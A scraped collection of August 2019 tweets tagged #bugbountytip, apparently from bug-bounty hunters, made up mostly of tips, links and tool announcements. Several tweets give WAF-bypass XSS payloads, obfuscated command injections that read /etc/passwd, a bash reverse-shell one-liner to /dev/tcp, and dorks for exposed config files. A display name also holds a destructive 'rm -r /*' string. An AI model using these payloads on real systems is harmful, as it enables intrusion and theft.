0 yay I found Jira Dashboard at @Hacker0x01 #DOD Exploiting Jira Dashboard Leads to (RCE) This report waiting a Disclosed / Fixed and waiting for #writeups #BugBounty #bugbountytip #rce #jira_rce https://t.co/T0M5Zr8q2B
Rishabh
@____cypher____


2019-08-20 18:35:23
0 Did you know you can "edit and resend" requests without any interceptor in Mozilla firefox #bugbountytip #BugBounty https://t.co/FrtUB2KUO8
Raihan Biswas ๐Ÿ‡จ๐Ÿ‡ฎ
@zapstiko


2019-08-20 15:08:22
4 {XSS}; CloudFront Bypass, dot shot. โœด๏ธ ~/1~ <iframe/onload='this["src"]="jav"+"as	cr"+"ipt:al"+"er"+"t()"';> ~/2~ <svg/onload=location=`javas`+`cript:ale`+`rt%2`+`81%2`+`9`;// #BugBounty #BugBountyTip #WAF #infosec
Faizal Abroni
@faizalabroni


2019-08-20 13:58:44
0 AWS Metadata Disclosure via hardoced host download (indonesian language) https://t.co/lkxDPZ8VN8 #bugbounty #bugbountytip #bugbountytips #togetherwehit #ittakesacrowd
C1h2e1
@C1h2e11


2019-08-20 13:34:45
2 A tips from Nahamsec @NahamSec curl -X GET https://t.co/pIuaaFEPZL{organization} https://t.co/5XaiHYznhj{organization} https://t.co/7AlvIjzWht{IP address} Shodan search query ASN:{ASN} #bugbountytip #bugbountytips https://t.co/RGdbP6rj4u
/๐’…๐’†๐’—/๐’๐’–๐’๐’
@spyerror


2019-08-20 13:08:57
3 {XSS}; CloudFront Bypass, dot shot. โœด๏ธ ~/1~ <iframe/onload='this["src"]="jav"+"as	cr"+"ipt:al"+"er"+"t()"';> ~/2~ <svg/onload=location=`javas`+`cript:ale`+`rt%2`+`81%2`+`9`;// #BugBounty #BugBountyTip #WAF #infosec
Securisec ๐Ÿš€
@securisec


2019-08-20 11:34:28
0 "RT RT Regala_: Here it is! Burp Scope Monitor, a simple Burp_Suite extension to help you keep track of unique endpoints in your history, marking them as analyzed, highlighting and other cool stuff! Check it out: https://t.co/EFXtxmOLEE #bugbounty #bugbountytip ๐Ÿฅณ๐Ÿฅณ๐Ÿ˜‡"
Cyberthereaper
@Cyberthereaper3


2019-08-20 10:54:47
0 sometimes we cannot find vulnerabilities due to a web browser problem. #hackerone #bugcrowd #infosec #bugbounty #bugbountytip #blackhat #defcon #redteam #LFI #RFI #hacking #chrome #firefox #recon #osint example : https://t.co/D0RK0uDcB2
Sergey Kashatov
@iframe0x01


2019-08-20 10:25:10
1 #hackerone #bugbounty #bugbountytip I just published How I upgraded my privileges to the administrator of Odnoklassnikiโ€™s url shortener https://t.co/yBKYctUp0a
Fisher
@Regala_


2019-08-20 09:20:01
14 Here it is! Burp Scope Monitor, a simple @Burp_Suite extension to help you keep track of unique endpoints in your history, marking them as analyzed, highlighting and other cool stuff! Check it out: https://t.co/2zzgrNvj3G #bugbounty #bugbountytip ๐Ÿฅณ๐Ÿฅณ๐Ÿ˜‡
luffydragneel
@Hackers_Guild


2019-08-20 06:53:26
0 If there is a subscription for a pro account for suppose 1 year, always Intercept the Request and change the subscription period. In some cases, you will be able to increase the subscription to any no. of years leading to Business logic vuln. #bugbountytip @SynackRedTeam https://t.co/NLDXDbquzY
Osama Avvan
@osamaavvan


2019-08-19 18:07:09
1 My Writeup about Different Ways of Exploiting CSRF. https://t.co/yneogH4EYL #bugbountytip @bugbountypocs
/๐’…๐’†๐’—/๐’๐’–๐’๐’
@spyerror


2019-08-19 16:40:35
0 { WAF }; bypass post based xss โœจ ~Payload; <message><dialogueType>&e;</dialogueType></message> ~Result; WAF Allowed: 200 #BugBounty #BugBountyTip #WAF #infosec https://t.co/f28Yby7WZR
Soroush Dalili
@irsdl


2019-08-19 11:33:43
0 #BugBountyTip: To make your Burp Suite testing faster, change its colour to Red! With go faster stripes as suggested by @bao7uo
Proxy
@LinuxKodachi


2019-08-19 11:27:51
0 ๐Ÿ›ก Honest advice, Sherlock! ๐Ÿ›ก #bugbountytip #mentor #entrepreneur #Developer #programming #programmers #startup https://t.co/0I8cofTS3X
ak1t4 ๐Ÿ‡ฆ๐Ÿ‡ท
@akita_zen


2019-08-19 06:38:08
2 #Bugbountytip: avoid to define yourself for what you know or what you have or what you get ($$$). You are truly unique and your being canโ€™t be defined by a temporal status. Enjoy bugbounty, play a little, bb needs to be fun :) #bugbounty #infosec #mentalhealth
Cyberthereaper
@Cyberthereaper3


2019-08-19 06:33:41
4 S3 bucket finder cat subdomain.txt | httprobe | tee hosts && meg -d 1000 -v / && grep -horiE [A-z0-9.-]+\.s3\.amazonaws\.com (You can change regex or you can add more regex with && ) @TomNomNom #hackerone #bugcrowd #recon #infosec #blackhat #bugbounty #bugbountytip #osint #s3
mr_nyx
@mr_nyxs


2019-08-18 19:11:24
1 Never give up! Payload URLENCODE(payload) URLENCODE(URLENCODE(payload)) URLENCODE(URLENCODE(URLENCODE(payload))) ... #BugBountyTip #BugBounty
HackIsOn ยฎ
@hackison


2019-08-18 17:33:00
0 What will be your answer to the following question #infosec people? ๐Ÿค” How to #hack android phones using Link ? ๐Ÿ˜‚ #hacking #pentesting #linux #bugbounty #bugbountytip #exploit #kalilinux #offsec #redteam #pentester #hackison #wapt #vapt
/๐’…๐’†๐’—/๐’๐’–๐’๐’
@spyerror


2019-08-18 17:12:44
2 Hi babe again I'm, whats up fbi. I warned very , lest he remove the search button from there. ๐Ÿ’ฃ Patch: https://t.co/NhIAxHWUUl #BugBounty #BugBountyTip #WAF #infosec https://t.co/azwQwX5nMh
YS
@YShahinzadeh


2019-08-18 16:45:08
0 JSONP call returning auth token -> acc takeover #bugbountytip
(((Gamliel)))
@Gamliel_InfoSec


2019-08-18 15:42:00
0 Don't expect different assets/endpoints if you are searching in the same subdomain. #bugbountytip #BugBounty #WebPentest #SearchSomethingElse
/๐’…๐’†๐’—/๐’๐’–๐’๐’
@spyerror


2019-08-18 14:21:24
5 "Cloudflare"; live payloads: ๐Ÿง  ~1: <img longdesc="src='x'onerror=alert(document.domain);//><img " src='showme'> ~2: <img longdesc="src=" images="" stop.png"="" onerror="alert(document.domain);//"" src="x" alt="showme"> #BugBounty #BugBountyTip #WAF
NetDevilz
@netdevilz


2019-08-18 13:03:14
0 Time may have forgotten everything, never date ... #netdevilz ฤฐCANN: https://t.co/FZafbc6qaj #bugbounty #webapp #bugbountytip #infosec #waf https://t.co/sYW3KKhdSo
/๐’…๐’†๐’—/๐’๐’–๐’๐’
@spyerror


2019-08-18 08:43:13
1 Sucuri { RCE }; payloads, dot shot. ๐ŸŒช๏ธ Smuggling RCE Payloads: </> /???/??t+/???/??ss?? </> Obfuscating RCE Payloads: </> ;+cat+/e'tc/pass'wd </> </> c\\a\\t+/et\\c/pas\\swd </> #BugBounty #BugBountyTip #WAF #infosec
Str0k1rch
@str0k1rch


2019-08-18 08:32:02
1 Do you guys stop trying for XSS When Cloudflare is used? If not, got any tips? :) #bugbountytip #bugbounty #infosec
Murdockz
@Murdockz_CEH


2019-08-18 02:47:26
1 Guys if you're looking for a way to host a Kali Linux instance in the cloud check out this tutorial on creating your own Kali Linux cloud VM with DigitalOcean https://t.co/xnP1cfd8lZ. I highly recommend. https://t.co/0TpWOKInke #bugbountytips #bugbountytip #bugbounty
/๐’…๐’†๐’—/๐’๐’–๐’๐’
@spyerror


2019-08-17 20:41:53
4 ModSecurity { RCE } Detection Bypass ๐Ÿ’ฅ { 1 }; ;+$u+cat+/etc$u/passwd$u { 2 }; ;+$u+cat+/etc$u/passwd+\# #BugBounty #BugBountyTip #WAF #infosec
John
@JohnH4X00R


2019-08-17 18:23:03
2 "Rather than scanning for vulnerabilities, we need to scan forย interesting behaviours"... Excellent advise by @albinowax from an old gem, must read... https://t.co/9FPy2OnCBM #bugbountytip
expl0itc0der
@vanshitmalhotra


2019-08-17 18:22:39
2 Bug Bounty Tip : Target Android Mobile Apps to get the Endpoints/Hostnames and Run PortScan -- #BugBounty #BugBountyTip #hackdoor
C1h2e1
@C1h2e11


2019-08-17 13:41:05
1 #BugBounty #bugbountytip Try to scan these sensitive files or add a header for a quick vulnerability scan https://t.co/ZuZ5xMEqmj
Ammar Amer
@cry__pto


2019-08-17 03:29:40
2 the most tow free important resource on the net to learn how to detect & exploit open-redirect & evade WAFs.if you are serious about learning thise vulnerability you should visite thise sites. https://t.co/IgbCjfguvb https://t.co/dGFkRiy43A https://t.co/1R23RdPEDN #bugbountytip
Soroush Dalili
@irsdl


2019-08-16 21:46:24
3 After spending so much time, finally here it is: "๐—จ๐—ฝ๐—น๐—ผ๐—ฎ๐—ฑ๐—ถ๐—ป๐—ด ๐˜„๐—ฒ๐—ฏ.๐—ฐ๐—ผ๐—ป๐—ณ๐—ถ๐—ด ๐—ณ๐—ผ๐—ฟ ๐—™๐˜‚๐—ป ๐—ฎ๐—ป๐—ฑ ๐—ฃ๐—ฟ๐—ผ๐—ณ๐—ถ๐˜ ๐Ÿฎ" https://t.co/L2XrRRfqU6 #appsec #FileUpload #pentest #bugbountytip https://t.co/O3jVp0TWVq
แƒ’แƒแƒฉแƒ แƒแƒฅแƒ แƒแƒซแƒ” (Gocha Okradze)
@GochaOqradze


2019-08-16 21:18:20
0 #burp, #bugbountytip,#bugbountytips Recon with BurpSuite. Only burp no extender. I like this way. https://t.co/siOc5UaDLf
SALTWRX
@SaltwrxLLC


2019-08-16 17:14:00
1 @AFSLabs For those looking to setup a droplet for doing reconnaissance. #bugbountytip
HackIsOn ยฎ
@hackison


2019-08-16 14:45:08
0 [Sensitive Directories] intitle:"Index of" wp-config.php [Sensitive Directories] intitle:index.of./.sql [Pages Containing Login Portals] site:*/cgi-bin/login.html [Various Online Devices] inurl:ftp://ftp robots.txt #dorks #hacking #bugbountytip #bugbountytips #pentesting
Milind Purswani
@MilindPurswani


2019-08-16 14:28:52
0 Have been testing for SSRF bypass for more than 2 hours on 1 endpoint -> Read the policy -> turns out, the endpoint is OOS. "Read the docs man! Read the docs!" ๐Ÿ˜‘๐Ÿ˜‘ #bugbountytip
OWASP Amass
@owaspamass


2019-08-16 14:23:16
0 OWASP Amass Fact: If you use the '-include' flag to reduce sources during your enum, be sure to include one or more of the following for ASN info: networksdb, radb, robtex, shadowserver, teamcymru and/or umbrella #osint #recon #bugbounty #bugbountytip https://t.co/QWTftRbJKT
expl0itc0der
@vanshitmalhotra


2019-08-16 14:04:28
1 Bug Bounty Tips - Always Read The Source Code //<>// #BugBounty #BugBountyTip
vj0shii
@vj0shii


2019-08-16 12:30:00
0 Best laptop for Penetration Testing and Bug Bounty Hunting @Apple @Dell @ASUS_ROG #bugbountytip #Pentesting
Detectify
@detectify


2019-08-16 11:00:10
0 Improving WordPress plugin security from both attack and defense side. Guest blog by @padannewitz. #detectifycrowdsource #bugbountytip https://t.co/627leeeH6R
abdoul gadiri balde
@moodiAbdoul


2019-08-16 10:26:29
1 #bugbounty #bugbountytips #bugbountytip never think that you can find nothing , i hacked a company that have top hacker in 00:51:31 #togetherwehitharder
Fisher
@Regala_


2019-08-16 07:32:13
0 Beta testing for Scope Monitor has started ๐Ÿฅณ๐Ÿฅณ #bugbounty #bugbountytip https://t.co/KREdPY8rJT
โ—พ
@saurinn_


2019-08-16 01:40:12
0 Anyone have a link for a tool to test for different kinds of tokens (Docker specially)? It has a GitHub repo #bugbountytip #bugbountytips #infosec
Mo'men Basel
@Momenbassel


2019-08-15 22:40:44
0 HTTP request headers can be a golden gem for finding vulnerabilities never miss tampering/adding these headers! https://t.co/SdDV656qa7 #BugBounty #bugbountytip #bugbountytips
Hussein Daher
@HusseiN98D


2019-08-15 22:05:06
7 A 2 year old RCE on a @Hacker0x01 program. Next post at 400 RT! ALSO: I'm interested in any security research team / pentest work (remote). If any company/team is interested about my services DM me :) #bugbounty #bugbountytips #bugbountytip #infosec https://t.co/S1BpVB2LWM
Spicy
@BlackSheepSpicy


2019-08-15 21:31:56
0 #bugbountytip brought this up in @thecybermentor 's stream chat last night but you can load line separated text files into burp suite's scope so you can literally paste sublist3r's output into a text file and chuck the entire scope into burp with just a few clicks #BugBounty
Daher Mohamed
@DaherMohamed4


2019-08-15 20:14:51
0 #BugBountyTip #BBTip If you have win10 and don't want/can't install linux, you can use this tut to have linux/ubuntu terminal on windows : https://t.co/ftDEbdjv8U Must have win10 64 bits
m0z
@LooseSecurity


2019-08-15 14:44:56
1 A lot of programmers seem to forget that POST parameters pose the exact same risks as GET parameters. POST-Based XSS POST-Based CSRF You can even get SQL Injection through POST parameters. It's obvious but some people only check GET parameters out of convenience. #bugbountytip
MRunal
@mrunal110


2019-08-15 10:10:41
4 I just published What is Server-Side Request Forgery (SSRF) and some proof of concept about SSRF. https://t.co/uaTPqB470R #bugs #bugbountytip #infosecurity #cybersecurity #responsibledisclosure #vulnerabilities
Alex Chapman
@ajxchapman


2019-08-15 08:45:26
1 When you get RCE/ Command Injection on a server, check the system uptime. This can reveal the (ab)use of containers and help clarify technical risk #bugbountytip learned from @erbbysam at #h1702
Hendrik
@hendrikvb


2019-08-14 21:29:12
0 #CSRF lesson of the day: IE11 does not properly handle #CORS checks on file URIs! #bugbountytip #vuln #infosec
lavernasec
@lavernasec


2019-08-14 14:38:00
0 Pwn an iPhone to bank $1m and Check Point gripes about WhatsApp privacy again https://t.co/fBUkEesuVv #bugbountytip #iphone #whatsapptips #privacy
{{ '127.0.0.1โ€™}}
@shivam31200


2019-08-14 08:45:53
0 So testing e commerce websites always check cms I found one of e commerce website is using magento I run as magento scan and found critical paths #bugbounty #bugbountytip Noob https://t.co/BBBPNECcrw
/๐’…๐’†๐’—/๐’๐’–๐’๐’
@spyerror


2019-08-14 00:19:08
2 </>Cloudflare skip filters, ~XSS Bypass via dot. <div style="background:url(/f#oo/;color:red/*/foo.jpg);">X #WAF #BugBounty #BugBountyTip #infosec
HackIsOn ยฎ
@hackison


2019-08-13 20:17:42
2 Here is a video about the complete step by step installation procedure of latest #nmap 7.80. #hacking #kalilinux #linux #bugbountytip #bugbounty #penetrationtesting #pentesting #windows #redteam ๐Ÿ”ด LINK: https://t.co/8FTl0sOOgT
Vail
@Vail_302


2019-08-13 19:41:01
0 I am still new to #bugbounty , however, if this can help anyone else, I built a cherrytree template to help with organization of targets. Any tips on making it better, let me know. #bugbountytip https://t.co/Ew4mIgsFiu
MRunal
@mrunal110


2019-08-13 18:35:46
0 I Published open-redirect-vulnerability blog https://t.co/tZezs6hMUN #bugs #bugbountytip #infosecurity #cybersecurity
ADM|N|STRAT0R
@strat0r


2019-08-13 17:54:39
0 You can use https://t.co/5wzwWvgY36 or google cache to peek at the landing page for public GitHub repos that have been taken offline ;) #bugbountytip
expl0itc0der
@vanshitmalhotra


2019-08-13 16:14:40
1 Amazon EBS snapshots exposed publicly leaking sensitive data in hundreds of thousands, security analyst reveals at DefCon 27 #BugBounty #BugBountyTip #devops #devsecops #penetrationtesting #pentesting #aws #cloud #security #cloudsecurity https://t.co/E0M5006vhc
/๐’…๐’†๐’—/๐’๐’–๐’๐’
@spyerror


2019-08-13 12:52:25
0 Bug bounty is a project designed to stop hackers and to learn the techniques and methods of hackers. { fucking mercenaries }; #BugBounty #BugBountyTip #WAF #infosec
Fisher
@Regala_


2019-08-13 08:54:07
1 Bounty hunters: how do you organize your notes on targets, especially when switching targets back and forth and doing it for a long time? A thread ๐Ÿ‘‡๐Ÿ‘‡๐Ÿ‘‡ #bugbounty #bugbountytip
GarimaShares
@GarimaBhaskar


2019-08-13 06:50:02
0 Apple is Offering a Bug Bounty of $1 Million If You Can Hack An iPhone https://t.co/nea8djOCnK #Apple #appledaily #applenews #AppleEvent #bugbountytip #MiLLiONS #technews #technologynews #hacking #Hackers #TechTrends #bloggerstribe #blogger #blogpost #garimashares #iOS #macOS https://t.co/Lk3P2YJyt8
mr_nyx
@mr_nyxs


2019-08-12 21:33:27
0 If you have a shop system or any other buying system, you should try intercepting both requests and responses and change the prices in both of them, you might find yourself paying only $5 instead of $1000 #BugBountyTip #BugBounty #parameter_tampering
Andri Wahyudi ๐Ÿ•Š๏ธ โ€
@andripwn


2019-08-12 20:09:34
0 109 Payloads {URL} for #Hackerone_Programs #DOD #Private_Programs #Public_Programs #bugbounty #recon #bugbountytip https://t.co/e8Tm8nwz2B
Mufeed VH
@mufeedvh


2019-08-12 16:52:00
1 sector:443 CTF Walkthrough: https://t.co/0BWhT2HYFj #ctf #capturetheflag #bugbounty #bugbountytip #bugbountytips
lavernasec
@lavernasec


2019-08-12 14:38:00
0 Apple will now pay hackers up to $1 million for reporting vulnerabilities https://t.co/kYH14KVkB9 #bugbountytip #Apple #vulnerabilities
Ammar Amer
@cry__pto


2019-08-12 12:01:33
2 OPEN REDIRECTS is a dangerous web application vulnerability that should not be ignored by the security team/bug bounty hunters. thise vunerability may lead to installing malware/phishing attacks. and at least the loss of the reputation and clients. #bugbountytip
Andri Wahyudi ๐Ÿ•Š๏ธ โ€
@andripwn


2019-08-12 11:38:33
0 #Verizon - CORS Vulnerable Lead's to Information Disclousure (Criticals Impact) #BugBounty #BugBountyTip #CORS https://t.co/zDzL0gjDK9
Wladimir Palant
@WPalant


2019-08-12 09:06:09
2 I tried producing some useful instructions for less experienced people to recognize flaws in password managers. Let me know whether it worked! #infosec #crypto #passwords #bugbounty #bugbountytip https://t.co/WTm5SDpTi9
Ameen
@ameenmaali


2019-08-12 06:48:12
3 #bugbountytip: Duplicating params, headers, etc can be useful for bypasses. i.e., file upload filters can potentially be bypassed by setting Content-Type twice (once for unallowed type and once for allowed). Authorization protection could be bypassed w/ the same method #bugbounty
/๐’…๐’†๐’—/๐’๐’–๐’๐’
@spyerror


2019-08-10 15:55:30
1 Finding was closed, no return. @YoncuBilisim #WAF #BugBounty #BugBountyTip #infosec https://t.co/eoVvedJriy
/๐’…๐’†๐’—/๐’๐’–๐’๐’
@spyerror


2019-08-10 15:52:25
0 { Cloudflare }; ~ XSS Bypass: ๐Ÿฆ </Scrpt/"%27--!>%20<Scrpt>%20confirm(1)%20</Scrpt> #BugBounty #WAF #BugBountyTip #infosec
[email protected]:~$ sudยค rm -r /*
@IAMPROPERSAM


2019-08-10 12:15:05
0 I nd so many others out there definitely needs this... Thanks man. #bugbountytip #bugbountytips https://t.co/wUNiL9k1t7
Andri Wahyudi ๐Ÿ•Š๏ธ โ€
@andripwn


2019-08-10 06:05:19
3 [ HTML Rich Text XSS Payload ] <div style="xg-p:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)" onclick="alert(1)">hackerb0y</button> #BugBounty #BugBountyTip #infosec
Aziz Hakim
@hackerb0y_


2019-08-10 05:48:46
1 [ HTML Rich Text XSS Payload ] <div style="xg-p:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)" onclick="alert(1)">hackerb0y</button> #infosec #bugbountytips #bugbountytip #bugbounty #xss
Andri Wahyudi ๐Ÿ•Š๏ธ โ€
@andripwn


2019-08-10 05:29:43
0 13 Hours ~ Fullstack Bug Bounty Programs H1 - 5 Reports Triaged Bugcrowd - 1 Triaged Yeswehack - 4 Triaged Graphql SQL-Injections / CORS / Blind SQL #BugBounty #BugBountytip #13hours #livehacks https://t.co/odsYNkdX2A
Andri Wahyudi ๐Ÿ•Š๏ธ โ€
@andripwn


2019-08-10 01:31:17
1 Graphql Api Leads to SQL - Injections #graphql #bugbounty #bugbountytip #bugbountytips https://t.co/lFNawsyPA5
Securisec ๐Ÿš€
@securisec


2019-08-09 22:46:15
0 "RT RT zer0pwn: Bruteforce subdomains from browser (thanks to Marzavec). Works by using DNS over HTTP for resolution. https://t.co/5f2PjHvwNE #security #bugbounty #bugbountytip #security #redteam #osint #discovery https://t.co/1poKJWd4FW"
Arif Khan
@payloadartist


2019-08-09 20:15:13
0 I earned $1,500 for my submission on @bugcrowd #ItTakesACrowd #bugbountytip: Recon is the key to low hanging fruits with great impact! https://t.co/7of1OAuwxa
Guilherme Keerok
@k33r0k


2019-08-09 19:47:55
1 another Cloudflare bypass: <iframe/src=javascript:%2520with(document)with(body)innerHTML="<svg/onload"%2B"=alert\x28\x29\x3e"> #bugbountytip #bugbounty #xss #bugbountytips
expl0itc0der
@vanshitmalhotra


2019-08-09 19:19:28
0 I you have found an XSS on https://t.co/hykP1iWSJZ ,Find pages running this code on https://t.co/bveLMweNqR : document.domain="https://t.co/dLs7d73fmn " It results in: XSS on A > XSS on B as SOP allows https://t.co/hykP1iWSJZ to access https://t.co/bveLMweNqR #bugbountytip
expl0itc0der
@vanshitmalhotra


2019-08-09 19:07:47
0 Cryptographic Attacks: A Guide for the Perplexed https://t.co/tRqja9L8pA Follow #Hackdoor - Facebook - https://t.co/iNczOcGmCt Youtube - https://t.co/42lWP1DIW0 #BugBounty #bugBountyTip
expl0itc0der
@vanshitmalhotra


2019-08-09 19:06:10
3 One Misconfig (JIRA) to Leak Them All- Including NASA and Hundreds of Fortune 500 Companies! https://t.co/k6aYmRDj1e Follow #Hackdoor - Facebook - https://t.co/iNczOcGmCt Twitter - https://t.co/KupiQVo8ex Youtube - https://t.co/42lWP1DIW0 #BugBounty #bugBountyTip
intigriti
@intigriti


2019-08-09 12:08:03
4 Doing recon? Don't forget the company resources! Slides, tutorials and other examples often contain a lot of juicy information! ๐Ÿ‘€Thanks for the #BugBountyTip, @Alyssa_Herrera_! #HackWithIntigriti https://t.co/CT1UYBZefH
/๐’…๐’†๐’—/๐’๐’–๐’๐’
@spyerror


2019-08-09 09:51:11
1 #blindrce turn it in to a { reverse shell! } ๐Ÿ‘๏ธ |`bash -i >& /dev/tcp/yourip/yourport 0>&1` #bugbounty #bugbountytip #waf #infosec
Ennio Campagna
@EnnioCamp


2019-08-09 08:36:10
0 Got excited this morning, just entered in the @CERTEU Hall of Fame, thank you to the #securityteam for the fast response! #bugbounty #bugbountytip perseverance is the key of success
Yassine Aboukir @ DefCon/H1-702
@Yassineaboukir


2019-08-08 20:46:55
0 Cheers to @NahamSec for featuring [ASNLookup](https://t.co/wGiLKKnvCb) tool in his latest stream about techniques to enumerate more assets leveraging Yahoo's ASN as a target example. Check it out! https://t.co/PcoHujPdsV #bugbountytip
Ameen
@ameenmaali


2019-08-08 20:12:30
2 Testing authorization/access controls with a numeric ID? Try decimals/floats and round to the number you want to access. Example: admin role ID is 1 Try to set your ID to 0.9 and it may bypass the auth check as system will round up after auth check #bugbountytip #bugbounty
Dominik
@zer0pwn


2019-08-08 17:24:08
11 Bruteforce subdomains from browser (thanks to Marzavec). Works by using DNS over HTTP for resolution. https://t.co/L0P5wVuwFD #security #bugbounty #bugbountytip #security #redteam #osint #discovery https://t.co/lxygQ8RqSK
gujjuboy10x00
@vis_hacker


2019-08-08 15:30:21
1 awesome git recon for bug hunters specially for newbie @Bugcrowd #ItTakesACrowd #bugbountytip https://t.co/I1r38Ms06X
Spicy
@BlackSheepSpicy


2019-08-08 15:26:51
0 #bugbountytip web server being annoying and 302ing your gobuster? use the wildcard flag and pipe the output thru an inverted grep expression #bugbounty https://t.co/KGeBLCvVzf
artofbugbounty
@artofbugbounty


2019-08-08 15:08:15
0 Not Your Typical Base64 Encoded Data! #bugbountytip https://t.co/pzvYvpzUm6 https://t.co/akZueVxv7o
A DNF ๐Ÿฆ–
@binb4sh


2019-08-08 10:47:40
0 I you have found an XSS on https://t.co/N5KFrxiY6l ,Find pages running this code on https://t.co/qV8UvGQ3nY : document.domain="https://t.co/2KVRowDP4i" It results in: XSS on A > XSS on B as SOP allows https://t.co/N5KFrxiY6l to access https://t.co/qV8UvGQ3nY #bugbountytip
Aashish Yadav
@aa5h15h


2019-08-08 10:26:05
1 Listed In Mozilla HOF https://t.co/hjvZ92kFOj #bugbounty #bugbountytip #webdev #mozilla #firefox #hackerone #bugcrowd #linux #unix #malware @mozilla
Mantis
@MantisSTS


2019-08-08 07:54:08
1 Thi should come in useful to some! #BugBounty #bugbountytip https://t.co/3jjJ8PrB2c
Andri Wahyudi ๐Ÿ•Š๏ธ โ€
@andripwn


2019-08-08 07:01:47
0 Paypal Bug Bounty 2019 - Exploiting HTML Injections https://t.co/EvfnAj5QmI #Paypal #BugBounty #BugBountyTip
Benson M
@Benson_Mwaura


2019-08-08 05:00:00
0 ๐Ÿ›ก๏ธ Discover How Do Bug Bounties Fit Into The Software Development Lifecycle (#infographic ๐ŸŽจ @Hacker0x01 ) @Fisher85M @pierrepinna @Shirastweet @CLAVDIAmartin @marcoessomba @ggithaiga #Cybersecurity #SecOps #DevOps #CISO #Cloudsec #Infosecurity #bugbountytip #bountyprogram https://t.co/TmRTGB8Mhv
Sanju
@sanjeethboddi


2019-08-08 02:45:12
0 @Amazon If you say simple "another" to the Alexa. It tells you a joke, which doesn't make any sense. You need to fix your NLP/NLG and make you have a proper dialogue flow. #bugbountytip #bugreport #alexa #amazonalexa #nlp #nlg
vavkamil
@vavkamil


2019-08-07 20:21:10
1 XFFenum ~ A simple tool to bypass 403 forbidden end-points behind load balancers (Cloudflare) based on X-Forwarded-For header #bugbounty #bugbountytip https://t.co/BR0X8TlGfT
Sajibe Kanti
@Sajibekantibd


2019-08-07 20:04:45
0 Some Time Check Cookies when Testing PHP based Web Pentest . Maybe You will get Password & user id on Cookies ;) #bugbountytip
/๐’…๐’†๐’—/๐’๐’–๐’๐’
@spyerror


2019-08-07 19:58:38
0 Reading { #passwd }, and other files. ๐Ÿง /***/[c][a]* /**[c]/*****[d] {/???/??t,/**[c]/*****[d]} /***/??t /**[c]/*****[d] /***[n]/??t /??[c]/?????[d] #WAF #BugBounty #BugBountyTip #infosec
แƒ’แƒแƒฉแƒ แƒแƒฅแƒ แƒแƒซแƒ” (Gocha Okradze)
@GochaOqradze


2019-08-07 19:01:41
0 #bugbountytip #bugbountytips Path: target/worker Yesterday my report Worker Loop Admin panel Noswag, nobounty, nothing Only thanks from owner :) sometime I am kind :) https://t.co/6yIqsMpfU6
Andri Wahyudi ๐Ÿ•Š๏ธ โ€
@andripwn


2019-08-07 16:51:53
0 XSS { Cloudfare } bypass: ๐Ÿ”ญ </> " <a+HREF='%26%237javascrip%26%239t:alert%26lpar;document.domain)'> " </> #WAF #BugBounty #BugBountyTip #infosec
intigriti
@intigriti


2019-08-07 16:51:01
0 Got a question? Follow @codingo_'s advice to get help faster! #BugBountyTip https://t.co/pkmcXReL9P
expl0itc0der
@vanshitmalhotra


2019-08-07 16:23:29
2 Security through obscurity works against scanners -- Agree/Disagree ?? #BugBounty #BugBountytip #penetrationtesting #pentesting #hacking #devops #devsecops
/๐’…๐’†๐’—/๐’๐’–๐’๐’
@spyerror


2019-08-07 13:20:11
13 XSS { Cloudfare } bypass: ๐Ÿ”ญ </> " <a+HREF='%26%237javascrip%26%239t:alert%26lpar;document.domain)'> " </> #WAF #BugBounty #BugBountyTip #infosec
Pavandeep
@Pavandep8


2019-08-07 13:13:18
0 Look what I shared: An introduction to Stack Buffer Overflows - #Hacking #hacker #Security #bugbountytip #BugBounty @MIUI| https://t.co/hM2ysqlhmI
expl0itc0der
@vanshitmalhotra


2019-08-07 12:46:03
0 https://t.co/X7i6Q9BLRA - SEARCH FOR LEAKS Search for Twitter users leaks #OSINT #recon #bugbounty #bugbountytip
Ammar Amer
@cry__pto


2019-08-07 11:52:48
2 go ahead and get those awesome free udemy courses for a limited time about python,hacking,ceh,networking,cybersecurity. 18 awesome course for a limited time. may the offer will end after 6 hours. so please share the post. #Hacking #pentest #bugbountytip #infosec #osint https://t.co/Gfiei78NO7
miraitowa
@miraitowa1


2019-08-07 10:25:53
0 Mahmoud Gamal - Security Blogs: Exploiting Out Of Band XXE using internal network ... https://t.co/CgGJMGZWfT #Bugbounty #bugbountytip #XXE
Hilary Sylar
@bit3c0de


2019-08-07 08:57:12
0 In honour of the best XSS tool out here, i wrote a small post about it. Simple and to the point. Great success with it and thought i'd share. https://t.co/UtvkJ3XFu0 #BugBounty #bugbountytip #pentest #xss #knoxss Thanks for the tool @brutelogic .
Mo'men Basel
@Momenbassel


2019-08-07 06:24:37
3 #bugbountytip: install keyFinder at your browser(https://t.co/TqSwU28eb4) --> surf the web --> go to results --> check API key at https://t.co/S3jRAYOEZp #BugBounty #bugbountytips #BugbountyProTip https://t.co/s0uGltinAD
expl0itc0der
@vanshitmalhotra


2019-08-06 20:53:06
0 Any script/one line command on aws cli to quickly get the list of permissions enabled for s3 bucket ? @awscloud #bugbounty #bugbountytip Command - aws s3api get-bucket-acl - - bucket bucketname
Pepipost
@pepi_post


2019-08-06 18:27:35
0 Are your emails really reaching Inbox? Find out in this free Email Health Report. Click here : https://t.co/Qr4QcFTjbi #bugbountytip #smtp https://t.co/2U7otQsTLZ
Pepipost
@pepi_post


2019-08-06 16:39:14
1 Is there a way to validate email addresses using #javascript? Lets find out - how!๐Ÿ‘‰ #bugbountytip https://t.co/9FBQD6PGOH
Ammar Amer
@cry__pto


2019-08-06 15:02:59
1 in the 19 chapter of the Real-world Bug Hunting by @yaworsk you will get a useful and detailed chapter about target RECONNAISSANCE and testing the application in an efficient and practical way. again the book is highly recommended. you can find the book at amazon #bugbountytip https://t.co/fPMrQyktZJ
Dhamu
@Dhamuharker


2019-08-06 14:50:27
1 #bugbountytips #BugBounty #bugbountytip #ItTakesACrowd #TogetherWeHitHarder XSS to RCE https://t.co/6YM2sk2j9Z
/๐’…๐’†๐’—/๐’๐’–๐’๐’
@spyerror


2019-08-06 13:21:38
2 Bypass 405 Alibaba { WAF }; ๐Ÿž with onloadstart/end and encode the parenthesis, /* <audio src=1 onloadstart=alert(1)//> */ #WAF #BugBounty #BugBountyTip #infosec
miraitowa
@miraitowa1


2019-08-06 13:02:37
3 Recon โ€” my way. by @ehsahil https://t.co/5sLBmHqhM8 #bugbounty #bugbountytip #recon
expl0itc0der
@vanshitmalhotra


2019-08-06 12:39:44
